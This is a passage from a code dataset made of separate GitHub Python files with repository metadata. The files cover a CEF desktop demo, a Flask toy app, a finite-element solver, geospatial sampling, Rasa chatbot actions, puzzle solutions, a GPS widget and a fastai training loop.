'root'\nDEFAULT_PASSWORD = 'root'\nDEFAULT_WINDOW_TITLE = '处女座之最 - 演示程序'\n\n# Globals\nWindowUtils = cef.WindowUtils()\n# 全局窗口句柄\ng_windows_handle = None\n# 多线程\ng_multi_threaded = False\n\n\nclass BindFunction:\n @staticmethod\n def get_title(callback):\n callback.Call(DEFAULT_WINDOW_TITLE)\n\n @staticmethod\n def login(data, callback):\n if 'username' not in data or 'password' not in data:\n callback.Call(False, '提交格式不正确')\n elif data['username'] == '' or data['password'] == '':\n callback.Call(False, '用户名密码不能为空')\n elif data['username'] == DEFAULT_USERNAME and data['password'] == DEFAULT_PASSWORD:\n callback.Call(True)\n else:\n callback.Call(False, '用户名或密码错误.')\n\n @staticmethod\n def min():\n win32gui.PostMessage(g_windows_handle, win32con.WM_SYSCOMMAND, win32con.SC_MINIMIZE)\n\n @staticmethod\n def max():\n # 判断窗口状态\n if win32gui.GetWindowPlacement(g_windows_handle)[1] == win32con.SW_SHOWMAXIMIZED:\n win32gui.PostMessage(g_windows_handle, win32con.WM_SYSCOMMAND, win32con.SC_RESTORE)\n else:\n win32gui.PostMessage(g_windows_handle, win32con.WM_SYSCOMMAND, win32con.SC_MAXIMIZE)\n\n @staticmethod\n def close():\n win32gui.PostMessage(g_windows_handle, win32con.WM_CLOSE)\n\n @staticmethod\n def move():\n # 捕获鼠标\n win32gui.ReleaseCapture()\n # 移动\n win32gui.SendMessage(g_windows_handle, win32con.WM_SYSCOMMAND, win32con.SC_MOVE + win32con.HTCAPTION, 0)\n pass\n\n\ndef main():\n sys.excepthook = cef.ExceptHook # To shutdown all CEF processes on error\n\n settings = {\n \"multi_threaded_message_loop\": g_multi_threaded,\n }\n cef.Initialize(settings=settings)\n\n window_proc = {\n win32con.WM_CLOSE: close_window,\n win32con.WM_DESTROY: exit_app,\n win32con.WM_SIZE: WindowUtils.OnSize,\n win32con.WM_SETFOCUS: WindowUtils.OnSetFocus,\n win32con.WM_ERASEBKGND: WindowUtils.OnEraseBackground\n }\n global g_windows_handle\n g_windows_handle = create_window(title=DEFAULT_WINDOW_TITLE,\n class_name=DEFAULT_WINDOW_TITLE,\n width=1100,\n height=730,\n window_proc=window_proc,\n icon=\"resources/chromium.ico\")\n\n window_info = cef.WindowInfo()\n window_info.SetAsChild(g_windows_handle)\n\n if g_multi_threaded:\n # When using multi-threaded message loop, CEF's UI thread\n # is no more application's main thread. In such case browser\n # must be created using cef.PostTask function and CEF message\n # loop must not be run explicitilly.\n cef.PostTask(cef.TID_UI,\n create_browser,\n window_info,\n {},\n DEFAUTL_URL)\n win32gui.PumpMessages()\n\n else:\n create_browser(window_info=window_info,\n settings={},\n url=DEFAUTL_URL)\n cef.MessageLoop()\n\n cef.Shutdown()\n\n\ndef create_browser(window_info, settings, url):\n assert (cef.IsThread(cef.TID_UI))\n bind_js(cef.CreateBrowserSync(window_info=window_info,\n settings=settings,\n url=url))\n\n\ndef bind_js(browser):\n \"\"\"\n 绑定js事件, 也可以用LoadHandler调用\n :param browser:\n :return:\n \"\"\"\n bindings = cef.JavascriptBindings()\n bindings.SetFunction(\"py_title\", BindFunction.get_title)\n bindings.SetFunction(\"py_login\", BindFunction.login)\n bindings.SetFunction(\"py_move\", BindFunction.move)\n bindings.SetFunction(\"py_windows_min\", BindFunction.min)\n bindings.SetFunction(\"py_windows_max\", BindFunction.max)\n bindings.SetFunction(\"py_windows_close\", BindFunction.close)\n browser.SetJavascriptBindings(bindings)\n\n\ndef create_window(title, class_name, width, height, window_proc, icon):\n # Register window class\n wndclass = win32gui.WNDCLASS()\n wndclass.hInstance = win32api.GetModuleHandle(None)\n wndclass.lpszClassName = class_name\n wndclass.style = win32con.CS_VREDRAW | win32con.CS_HREDRAW\n wndclass.hbrBackground = win32con.COLOR_WINDOW\n wndclass.hCursor = win32gui.LoadCursor(0, win32con.IDC_ARROW)\n wndclass.lpfnWndProc = window_proc\n atom_class = win32gui.RegisterClass(wndclass)\n assert (atom_class != 0)\n\n # Center window on screen.\n screenx = win32api.GetSystemMetrics(win32con.SM_CXSCREEN)\n screeny = win32api.GetSystemMetrics(win32con.SM_CYSCREEN)\n xpos = int(math.floor((screenx - width) / 2))\n ypos = int(math.floor((screeny - height) / 2))\n if xpos < 0:\n xpos = 0\n if ypos < 0:\n ypos = 0\n\n # Create window\n window_style = (win32con.WS_POPUP | win32con.WS_CLIPCHILDREN\n | win32con.WS_VISIBLE)\n window_handle = win32gui.CreateWindow(class_name, title, window_style,\n xpos, ypos, width, height,\n 0, 0, wndclass.hInstance, None)\n assert (window_handle != 0)\n\n # Window icon\n icon = os.path.abspath(icon)\n if not os.path.isfile(icon):\n icon = None\n if icon:\n # Load small and big icon.\n # WNDCLASSEX (along with hIconSm) is not supported by pywin32,\n # we need to use WM_SETICON message after window creation.\n # Ref:\n # 1. http://stackoverflow.com/questions/2234988\n # 2. http://blog.barthe.ph/2009/07/17/wmseticon/\n bigx = win32api.GetSystemMetrics(win32con.SM_CXICON)\n bigy = win32api.GetSystemMetrics(win32con.SM_CYICON)\n big_icon = win32gui.LoadImage(0, icon, win32con.IMAGE_ICON,\n bigx, bigy,\n win32con.LR_LOADFROMFILE)\n smallx = win32api.GetSystemMetrics(win32con.SM_CXSMICON)\n smally = win32api.GetSystemMetrics(win32con.SM_CYSMICON)\n small_icon = win32gui.LoadImage(0, icon, win32con.IMAGE_ICON,\n smallx, smally,\n win32con.LR_LOADFROMFILE)\n win32api.SendMessage(window_handle, win32con.WM_SETICON,\n win32con.ICON_BIG, big_icon)\n win32api.SendMessage(window_handle, win32con.WM_SETICON,\n win32con.ICON_SMALL, small_icon)\n\n return window_handle\n\n\ndef close_window(window_handle, message, wparam, lparam):\n browser = cef.GetBrowserByWindowHandle(window_handle)\n browser.CloseBrowser(True)\n # OFF: win32gui.DestroyWindow(window_handle)\n return win32gui.DefWindowProc(window_handle, message, wparam, lparam)\n\n\ndef exit_app(*_):\n win32gui.PostQuitMessage(0)\n return 0\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Virace/python-jgah","sub_path":"Main/2154/gui/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"30551512179","text":"from collections import deque\r\n\r\ndir = [(0,1),(0,-1),(-1,0),(1,0)]\r\n\r\ndef bfs(r,c):\r\n cnt = 0\r\n q = deque()\r\n q.append((r,c))\r\n while q:\r\n r,c = q.popleft()\r\n for k in range(4):\r\n nr = r + dir[k][0]\r\n nc = c + dir[k][1]\r\n if 0<=nr Index spletna stran, zdravo {up_ime} \"\n\n@app.route(\"/about\", methods=[\"GET\"])\ndef on_about():\n return render_template(\"about.html\")\n\n@app.route(\"/about\", methods=[\"POST\"])\ndef on_about_post():\n ime = request.form.get(\"vnos-imena\")\n geslo = request.form.get(\"psw\")\n response = make_response (\n render_template(\"about_replay.html\", ime=ime, geslo=geslo)\n )\n response.set_cookie(\"uporabnisko_ime\", ime)\n return response\n\n@app.route(\"/logout\")\ndef logout():\n response = make_response(\"logout\")\n response.set_cookie(\"uporabnisko_ime\", \"\", expires=0)\n return response\n \nif __name__ == \"__main__\":\n app.run()","repo_name":"Kodermatic/SN---17_WEBapp2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28042783135","text":"import serial\nimport time\n\nport = '/dev/ttyUSB0'\nser = serial.Serial(port,9600)\n\nwhile True:\n \n f=open(\"/home/pi/rpi-lora-tranceiver-master/dragino_lora_app/tfdata.txt\",'r')\n data = f.read()\n f.close()\n #led = raw_input(\" 'A-K' , 'z' : \") \n ser.write(data)\n # if led == \"e\" :\n # print(\"program End\")\n # break","repo_name":"whydizzy27/2019NetChallenge","sub_path":"LoraModule_Wireless_Communication/Server 1/sr.py","file_name":"sr.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"11069109169","text":"__author__ = 'Nasser'\n\nimport numpy as np\nfrom scipy.sparse.linalg import spsolve\nfrom scipy import sparse\nimport matplotlib.pyplot as plt\nimport gmsh\nimport element2dof\nimport assemble2dof\nimport plotter\nimport boundaryconditions2dof\nimport processing\n\ndef solver(meshName, material, body_forces, traction_imposed,\n displacement_imposed,\n plotUndeformed, plotStress, plotDeformed):\n\n\n mesh = gmsh.parse(meshName)\n\n ele = element2dof.Matrices(mesh)\n\n s = mesh.surfaces\n matDic = {s[i]: material[j] for i, j in enumerate(material)}\n\n ele.stiffness(matDic)\n\n ele.body_forces(body_forces)\n\n K = assemble2dof.globalMatrix(ele.K, mesh)\n\n P0q = assemble2dof.globalVector(ele.P0q, mesh)\n\n P0t = boundaryconditions2dof.neumann(mesh, traction_imposed)\n\n P0 = P0q + P0t\n\n Km, P0m = boundaryconditions2dof.dirichlet(K, P0, mesh,displacement_imposed)\n\n Ks = sparse.csc_matrix(Km)\n\n U = spsolve(Ks, P0m)\n\n ele.nodal_forces(U)\n Pnode = assemble2dof.globalVector(ele.pEle, mesh)\n\n sNode, sEle, eEle = processing.stress_recovery_simple(mesh, U, material)\n\n principal_max = processing.principal_stress_max(sNode[0], sNode[1], sNode[2])\n principal_min= processing.principal_stress_min(sNode[0], sNode[1], sNode[2])\n\n dpi = 90\n magf = plotDeformed['DeformationMagf']\n\n #PLOTTER CONTOUR MAPS\n if plotStress['s11'] == True:\n plotter.tricontourf(sNode[0]/10**3, mesh,\n 'Stress 11 (kPa)','spring', dpi)\n\n if plotStress['s22'] == True:\n plotter.tricontourf(sNode[1]/10**3, mesh,\n 'Stress 22 (kPa)','cool', dpi)\n\n if plotStress['s12'] == True:\n plotter.tricontourf(sNode[2]/10**3, mesh,\n 'Stress 12 (kPa)','hsv', dpi)\n\n if plotStress['sPmax'] == True:\n plotter.tricontourf(principal_max/10**3, mesh,\n 'Stress Principal Max (kPa)','autumn', dpi)\n\n if plotStress['sPmin'] == True:\n plotter.tricontourf(principal_min/10**3, mesh,\n 'Stress Principal min (kPa)','winter', dpi)\n\n #PLOTTER DRAW UNDEFORMED SHAPE, ELEMENTS, LABELS, BC\n if plotUndeformed['Domain'] == True:\n plotter.draw_domain(mesh, 'Case Study', dpi, 'k')\n\n if plotUndeformed['Elements'] == True:\n plotter.draw_elements(mesh, 'Case Study', dpi, 'k')\n\n if plotUndeformed['ElementLabel'] == True:\n plotter.draw_elements_label(mesh, 'Case Study',dpi)\n\n if plotUndeformed['EdgesLabel'] == True:\n plotter.draw_edges_label(mesh, 'Case Study',dpi)\n\n if plotUndeformed['NodeLabel'] == True:\n plotter.draw_nodes_label(mesh, 'Case Study',dpi)\n\n if plotUndeformed['SurfaceLabel'] == True:\n plotter.draw_surface_label(mesh, 'Case Study', dpi)\n\n #PLOTTER DEFORMED SHAPE\n if plotDeformed['DomainUndeformed'] == True:\n plotter.draw_domain(mesh, 'Deformed Shape', dpi, 'SteelBlue')\n\n if plotDeformed['ElementsUndeformed'] == True:\n plotter.draw_elements(mesh, 'Deformed Shape', dpi, 'SteelBlue')\n\n if plotDeformed['DomainDeformed'] == True:\n plotter.draw_deformed_domain(mesh, U, 'Deformed Shape', dpi, magf, 'Tomato')\n\n if plotDeformed['ElementsDeformed'] == True:\n plotter.draw_deformed_elements(mesh, U, 'Deformed Shape', dpi, magf,\n 'Tomato', 1)\n\n plt.show()\n","repo_name":"nasseralkmim/elfLAB","sub_path":"elasticity2d.py","file_name":"elasticity2d.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"13464489605","text":"\"\"\"\nModule with class SampleShape for sampling polygon maps with a regular \ngrid.\n\"\"\"\nimport numpy as np\nfrom pandas import Series, DataFrame\nimport pandas as pd\nfrom geopandas import GeoDataFrame\nimport geopandas as gpd\nimport matplotlib.pyplot as plt\n\nclass SamplePolygonMap:\n \"\"\"Sample polygon map at grid points.\n\n Properties\n ----------\n gridpoints\n GeoDataFrame with gridpoints.\n sample\n GeoDataFrame with sampled values at gridpoints.\n bbox\n Grid boundaries as (xmin,ymin,xmax,ymax).\n\n Methods\n -------\n plot_sample\n Plot map of sample points.\n\n \"\"\"\n\n XMIN = 0\n XMAX = 280000\n YMIN = 300000\n YMAX = 620000\n STEP = 100\n CRS = 'epsg:28992' # Dutch RD grid\n\n def __init__(self,polygonmap,bbox=None,gridtype='regular',\n step=100,grid=None,crs='epsg:28992',):\n \"\"\"\n Parameters\n ----------\n polygonmap : geopandas.GeoDataFrame\n Polygon map as input to sample.\n bbox : numpy array, list or tuple, optional.\n Grid limits as (xmin,ymin,xmax,ymax).\n gridtype : {'regular','repr'}, default 'regular'\n Sample grid layout.\n step : number, default 100\n Grid points distance for regular grid.\n grid : GeoDataFrame, optional\n Existing grid for sampling (gridtype and step will be\n ignored).\n crs : str, default 'epsg:28992'\n Polygon map crs.\n\n \n \"\"\"\n\n if not isinstance(polygonmap,GeoDataFrame):\n raise Exception(f'Expect class GeoDataFrame, not {polygonmap.__class__}')\n\n self._poly = polygonmap\n self._step = step\n self._crs = crs\n\n if bbox is None:\n self._bbox = self._map_bounds()\n elif isinstance(bbox,GeoDataFrame):\n self._bbox = self._map_bounds(bbox)\n #self._bbox = bbox.total_bounds\n elif len(list(bbox))==4:\n self._bbox = bbox\n else:\n raise ValueError(f'Invalid bbox {bbox}')\n\n # Set grid or define new grid\n if grid is not None:\n\n if not isinstance(grid,GeoDataFrame):\n warnings.warn((f'Given grid is not GeoPandas but '\n f'{type(grid)}. New default grid will be created.'))\n grid = None\n self._gridpoints = grid\n\n if grid is None:\n \n if gridtype not in ['regular','repr']:\n warnings.warn((f'{gridtype} is not a valid grid type. '\n f'Regular grid will be returned.'))\n self._gridtype='regular'\n\n if gridtype=='regular':\n self._gridpoints = self._regular_grid()\n elif gridtype=='repr':\n self._gridpoints = self._poly.representative_point()\n self._gridpoints = self._gridpoints.reset_index(drop=True)\n \n # Sample the polygon on gridpoints\n self._sample = gpd.sjoin(self._gridpoints,self._poly,how='inner',op='within')\n self._sample = self._sample.reset_index(drop=True)\n if 'index_right' in self._sample.columns:\n self._sample = self._sample.drop(columns=['index_right'])\n\n\n def __repr__(self):\n npoly = len(self._poly)\n return f'{self.__class__.__name__} ({npoly} polygons)' \n\n def _map_bounds(self,polymap=None):\n \"\"\"Return boundary points for a regular sample grid that covers \n entire polygon shape\n \n Returns\n -------\n numpy.array([xmin,ymin,xmax,ymax])\n \n \"\"\"\n if polymap is None:\n polymap = self._poly\n\n xmin,ymin,xmax,ymax = polymap.total_bounds\n step = self._step\n xmin = xmin - (xmin % step)\n xmax = xmax - (xmax % step) + step\n ymin = ymin - (ymin % step)\n ymax = ymax - (ymax % step) + step\n return np.array([xmin,ymin,xmax,ymax])\n\n def _regular_grid(self):\n \"\"\"Return regular grid of sampling points\"\"\"\n gridpoints = self.regular_grid(bbox=self.bbox,step=self._step)\n return gridpoints\n\n @classmethod\n def regular_grid(cls, bbox=None, step=None):\n\n # set grid bounadries\n if bbox is None: # nederland\n xmin,ymin,xmax,ymax = cls.XMIN,cls.YMIN,cls.XMAX,cls.YMAX\n else:\n xmin,ymin,xmax,ymax = bbox\n\n # set grid distance\n if step is None:\n step = cls.STEP\n\n xp = np.arange(xmin,xmax,step)\n yp = np.arange(ymin,ymax,step)\n xx, yy = np.meshgrid(xp, yp)\n pointgeom = gpd.points_from_xy(xx.flatten(), yy.flatten(), crs=cls.CRS)\n gridpoints = gpd.GeoDataFrame(geometry=pointgeom)\n gridpoints['pointid'] = gridpoints.index.astype(str)\n gridpoints['pointarea_ha'] = step**2/10000\n\n return gridpoints\n\n\n\n @property\n def gridpoints(self):\n \"\"\"GeoDataFrame with gridpoints.\"\"\"\n return self._gridpoints\n\n @property\n def sample(self):\n \"\"\"GeoDataFrame with sampled values at gridpoints.\"\"\"\n return self._sample\n\n @property\n def bbox(self):\n \"\"\"Return grid boundaries as (xmin,ymin,xmax,ymax)\"\"\"\n return self._bbox\n\n def plot_sample(self):\n \"\"\"Plot map of gridpoints and sampled points\"\"\"\n fig, ax = plt.subplots()\n self.gridpoints.plot(ax=ax,color='#c0d6e4',markersize=1)\n self.sample.plot(ax=ax,color='#9000c0',markersize=5)\n plt.xticks(rotation=90)\n return ax","repo_name":"tdmeij/DSreader","sub_path":"DSreader/sample/samplepolygonmap.py","file_name":"samplepolygonmap.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"70086540958","text":"# This files contains your custom actions which can be used to run\n# custom Python code.\n#\n# See this guide on how to implement these action:\n# https://rasa.com/docs/rasa/core/actions/#custom-actions/\nimport random\nfrom typing import Any, Text, Dict, List, Union\n\nfrom rasa_sdk import Action, Tracker\nfrom rasa_sdk.forms import FormAction\nfrom rasa_sdk.executor import CollectingDispatcher\n\n\nTECHNIQUES = (\n \"Edging\",\n \"Smearing\",\n \"Flagging\",\n \"Stemming\",\n \"Bat Hang\",\n \"Lay-Backing\",\n \"Mantle\",\n \"Undercling\",\n \"Drop Knee/Back Step\",\n \"Cross Through\",\n \"Side Pull\",\n \"Palming\",\n \"Dyno\",\n \"Heel Hook\",\n \"Toe Hook\",\n \"Lock-off\",\n \"Gaston\",\n)\n\n\nclass ActionHelloWorld(Action):\n def name(self) -> Text:\n return \"action_list_random_techniques\"\n\n def run(\n self,\n dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any],\n ) -> List[Dict[Text, Any]]:\n\n techniques = random.choices(TECHNIQUES, k=5)\n dispatcher.utter_message(\n text=f\"Here are some common bouldering techniques: {', '.join(techniques)}.\"\n )\n\n return []\n\n\nclass GymForm(FormAction):\n def name(self) -> Text:\n return \"gym_form\"\n\n @staticmethod\n def required_slots(tracker: Tracker) -> List[Text]:\n return [\"gym_form_when\", \"gym_form_location\"]\n\n def submit(\n self,\n dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any],\n ) -> List[Dict]:\n # utter submit template\n dispatcher.utter_message(text=\"Cool, you can go to Berta Block!\")\n return []\n\n def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n \"\"\"\n Map the slots to entities.\n \"\"\"\n return {\n \"gym_form_when\": self.from_entity(entity=\"time\"),\n \"gym_form_location\": self.from_entity(entity=\"GPE\"),\n }\n","repo_name":"m-vdb/boulder-bot","sub_path":"actions/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"26440336800","text":"from typing import Any, Dict, Optional\n\nimport requests\n\nfrom django_postcode_lookup.backends import base\n\n\nclass PostcodeApiNu(base.Backend):\n\n def __init__(self, api_key: str, base_url: str, **kwargs):\n super(PostcodeApiNu, self).__init__(**kwargs)\n self._base_url = base_url\n self._session = requests.Session()\n self._session.headers = {\n \"x-api-key\": api_key,\n \"Accept\": \"application/json\"\n }\n\n def _get(self, postcode: str, number: str) -> Optional[base.PostcodeLookupResult]:\n postcode = postcode.replace(' ', '').upper()\n\n url = f\"{self._base_url}/{postcode}/{number}\"\n\n response = self._session.get(url)\n\n if response.status_code == 200:\n return _extract_results(response.json())\n\n\ndef _extract_results(result: Dict[str, Any]) -> base.PostcodeLookupResult:\n postcode = result[\"postcode\"]\n number = result['number']\n street = result[\"street\"]\n city = result['city']\n\n # format postcode to '1234 AA'\n if len(postcode) == 6:\n postcode = postcode[:4] + ' ' + postcode[4:]\n\n return base.PostcodeLookupResult(\n postcode=postcode,\n number=number,\n city=city,\n street=street)\n","repo_name":"labd/django-postcode-lookup","sub_path":"src/django_postcode_lookup/backends/postcodeapinu.py","file_name":"postcodeapinu.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"51"} +{"seq_id":"3303813539","text":"import sys\r\n\r\nerr, com = 0, []\r\nend_brackets = ')]}>'\r\nopen_brackets = '([{<'\r\nerrmap = dict(zip(end_brackets, [3, 57, 1197, 25137]))\r\ncommap = dict(zip(end_brackets, [1, 2, 3, 4]))\r\nmatch = dict(zip(end_brackets, open_brackets))\r\nrev_match = dict(zip(open_brackets, end_brackets))\r\nincomplete = []\r\nfor line in sys.stdin:\r\n line = line.strip()\r\n stack = []\r\n corrupt = False\r\n for i in line:\r\n if i in errmap:\r\n if match[i] != stack.pop():\r\n err += errmap[i]\r\n corrupt = True\r\n break\r\n else:\r\n stack.append(i)\r\n if stack and not corrupt:\r\n incomplete.append(stack)\r\nprint(\"Part 1:\", err)\r\n\r\nincomplete = list(map(lambda x: list(map(lambda y: rev_match[y], x[::-1])), incomplete))\r\nfor i in incomplete:\r\n score = 0\r\n for j in i:\r\n score *= 5\r\n score += commap[j]\r\n com.append(score)\r\nprint(\"Part 2:\", sorted(com)[len(com) // 2])","repo_name":"RussellDash332/aoc-2021","sub_path":"Day-10/Python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"39910490280","text":"from functools import wraps\n\n\ndef offset_pagination(f):\n\n @wraps(f)\n def wrapper(self, request, *args, **kwargs):\n params = request.query_params.copy()\n offset = self.paginator.get_offset(request) + 1\n page_size = self.paginator.get_page_size(request)\n\n params.setdefault('start', offset)\n params.setdefault('num', page_size)\n\n request.pagination_params = params\n return f(self, request, *args, **kwargs)\n return wrapper\n","repo_name":"waffle-iron/arcgis-marketplace","sub_path":"arcgis_marketplace/api/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"2008255664","text":"N = int(input())\r\n\r\ncard_list = list(map(int, input().split()))\r\n\r\nM = int(input())\r\n\r\nsearch_list = list(map(int, input().split()))\r\n\r\n\r\ncount_dict = {}\r\nfor card in card_list:\r\n if card in count_dict:\r\n count_dict[card] += 1\r\n else:\r\n count_dict[card] = 1\r\n\r\nresult_list = []\r\nfor search in search_list:\r\n if search in count_dict:\r\n result_list.append(count_dict[search])\r\n else:\r\n result_list.append(0)\r\n\r\nfor result in result_list:\r\n print(result, end=\" \")","repo_name":"jst0951/CodingTest","sub_path":"백준/Silver/10816. 숫자 카드 2/숫자 카드 2.py","file_name":"숫자 카드 2.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42711277930","text":"import sys\n\n\ndef pos2int(p):\n p = p.translate(str.maketrans(\"FBLR\", \"0101\"))\n p = int(p,2)\n return p\n\n\npos = list()\nfor line in sys.stdin.readlines():\n pos.append(pos2int(line))\n\npos.sort()\n\nfor i in range(1,len(pos)-1):\n if pos[i+1] == pos[i] + 2:\n print(pos[i]+1)\n sys.exit(0)\n","repo_name":"ribalda/adventofcode","sub_path":"2020/5/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35199490590","text":"import math\nimport logging\n\nfrom PyQt5.QtWidgets import QWidget, QMessageBox\nfrom PyQt5.QtCore import QTimer, Qt\nfrom qgis.core import QgsPointXY, QgsWkbTypes\nfrom iquaview.src.ui.ui_gps import Ui_GPSwidget\nfrom iquaview.src.canvastracks.canvasmarker import CanvasMarker\nfrom iquaview.src.cola2api.gps_driver import GpsDriver\n\nlogger = logging.getLogger(__name__)\n\n\nclass GPSWidget(QWidget, Ui_GPSwidget):\n\n def __init__(self, canvas, config, parent=None):\n super(GPSWidget, self).__init__(parent)\n self.setupUi(self)\n\n self.canvas = canvas\n self.config = config\n self.default_color = Qt.darkGreen\n\n width = self.config.csettings[\"vessel_width\"]\n length = self.config.csettings[\"vessel_length\"]\n\n self.marker = CanvasMarker(self.canvas, self.default_color,\n \":/resources/vessel.svg\", width, length,\n marker_mode=True, config=config)\n self.trackwidget.init(\"GPS track\", self.canvas, self.default_color, QgsWkbTypes.LineGeometry, self.marker)\n self.gps = None\n self.connected = False\n self.set_label_disconnected()\n\n # set signals\n self.connectButton.clicked.connect(self.connect)\n\n self.timer = QTimer()\n self.timer.timeout.connect(self.gps_update_canvas)\n\n def connect(self):\n if not self.connected:\n try:\n if self.config.csettings['gps_serial']:\n self.gps = GpsDriver(serial_port=self.config.csettings['gps_serial_port'],\n baud_rate=self.config.csettings['gps_serial_baudrate'])\n else:\n self.gps = GpsDriver(ip_addr=self.config.csettings['gps_ip'],\n hdt_port=self.config.csettings['gps_hdt_port'],\n gga_port=self.config.csettings['gps_gga_port'])\n\n self.gps.connect()\n\n self.gps.gpsconnectionfailed.connect(self.connection_failed)\n self.gps.gpsparsingfailed.connect(self.parsing_failed)\n self.connectButton.setText(\"Disconnect\")\n self.connected = True\n self.timer.start(1000)\n self.gps_status_label.setText(\"Connected\")\n self.gps_status_label.setStyleSheet('font:italic; color:green')\n except:\n logger.error(\"Connection with GPS could not be established\")\n QMessageBox.critical(self,\n \"Connection Failed\",\n \"Connection with GPS could not be established\",\n QMessageBox.Close)\n self.connected = False\n self.set_label_disconnected()\n self.trackwidget.centerButton.setEnabled(False)\n self.disconnect()\n else:\n self.disconnect()\n\n def disconnect(self):\n if self.gps is not None:\n self.gps.close()\n self.timer.stop()\n self.connected = False\n self.trackwidget.close()\n self.connectButton.setText(\"Connect\")\n self.trackwidget.centerButton.setEnabled(False)\n\n self.set_label_disconnected()\n\n def gps_update_canvas(self):\n if self.connected:\n data = self.gps.get_data()\n if data['status'] == 'new_data' and (data['quality'] >= 1) and (data['quality'] <= 5):\n gps_lat = data['latitude']\n gps_lon = data['longitude']\n gps_heading = data['heading']\n pos = QgsPointXY(gps_lon, gps_lat)\n self.trackwidget.track_update_canvas(pos,\n math.radians(gps_heading-self.config.csettings['gps_offset_heading']))\n self.gps_status_label.setText(\"Connected, receiving signal\")\n self.gps_status_label.setStyleSheet('font:italic; color:green')\n\n elif data['status'] == 'old_data':\n self.parsing_failed()\n\n\n def set_label_disconnected(self):\n self.gps_status_label.setText(\"Disconnected\")\n self.gps_status_label.setStyleSheet('font:italic; color:red')\n\n def parsing_failed(self):\n self.gps_status_label.setText(\"Connected, NO signal\")\n self.gps_status_label.setStyleSheet('font:italic; color:red')\n\n def connection_failed(self):\n QMessageBox.critical(self,\n \"Connection Failed\",\n \"Connection with GPS could not be established\",\n QMessageBox.Close)\n self.disconnect()\n\n def is_connected(self):\n return self.connected\n\n def update_width_and_length(self):\n width = self.config.csettings[\"vessel_width\"]\n length = self.config.csettings[\"vessel_length\"]\n self.marker.set_width(width)\n self.marker.set_length(length)\n self.gps_update_canvas()\n","repo_name":"martorelltorres/iquaview_1.1.0","sub_path":"iquaview/iquaview/src/canvastracks/gpswidget.py","file_name":"gpswidget.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30640492039","text":"class Solution:\n MAX_DEPTH = -1\n\n def traverse(self, node, cur_depth=1):\n if not node:\n return None\n\n self.MAX_DEPTH = max(self.MAX_DEPTH, cur_depth)\n\n self.traverse(node.left, cur_depth + 1)\n self.traverse(node.right, cur_depth + 1)\n\n def maxDepth(self, root: TreeNode) -> int:\n self.traverse(root)\n\n return self.MAX_DEPTH\n","repo_name":"readleyj/LeetCode","sub_path":"Python/0104_maximum-depth-of-binary-tree.py","file_name":"0104_maximum-depth-of-binary-tree.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14149371725","text":"from fastai.vision import *\nfrom sklearn.model_selection import KFold\nimport glob\nimport numpy as np\nimport configparser\nimport os\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=UserWarning, module=\"torch.nn.functional\")\n\n# Custom imports\nsys.path.append('../../')\nfrom utils.model_export import custom_export\n\ndef training_loop(path_img, model_dir_path, all_images_paths, codes, size, bs, get_y_fn, k_folds, seed, lr_find=False):\n\n '''\n Training function for image segmentation\n :param path_img: path to images\n :param model_dir_path: path to save models\n :param all_images_paths: list of all image paths\n :param codes: names of the classes\n :param size: image size\n :param bs: batch size\n :param get_y_fn: function to get label names\n :param k_folds: number of folds\n :param seed: random seed\n :param lr_find: True if we want to find the optimal LR and false to directly train\n :return: None\n '''\n\n kf = KFold(n_splits=k_folds, shuffle=True, random_state=seed)\n\n n_fold = 0\n for train_index, test_index in kf.split(all_images_paths):\n print('Fold ' + str(n_fold))\n\n train_list, val_list = all_images_paths[train_index], all_images_paths[test_index]\n val_list_final = []\n for i_l in range(len(val_list)):\n val_list_final.append(val_list[i_l].split('/')[-1])\n\n model_dir = model_dir_path + 'fold-' + str(n_fold) + '/'\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n\n # create valid.txt\n src = (SegmentationItemList.from_folder(path_img)\n .split_by_files(val_list)\n .label_from_func(get_y_fn, classes=codes))\n\n data = (src.transform(get_transforms(max_zoom=1.3, max_lighting=0.4, max_warp=0.4, p_affine=1., p_lighting=1.),\n size=size, tfm_y=True)\n .databunch(bs=bs, num_workers=0)\n .normalize(imagenet_stats))\n\n # Define metrics\n metrics = [partial(dice, iou=True), dice]\n\n wd = 1e-2\n learn = unet_learner(data, models.resnet34, metrics=metrics, wd=wd)\n learn.model_dir = model_dir\n\n lr_def = 0\n if 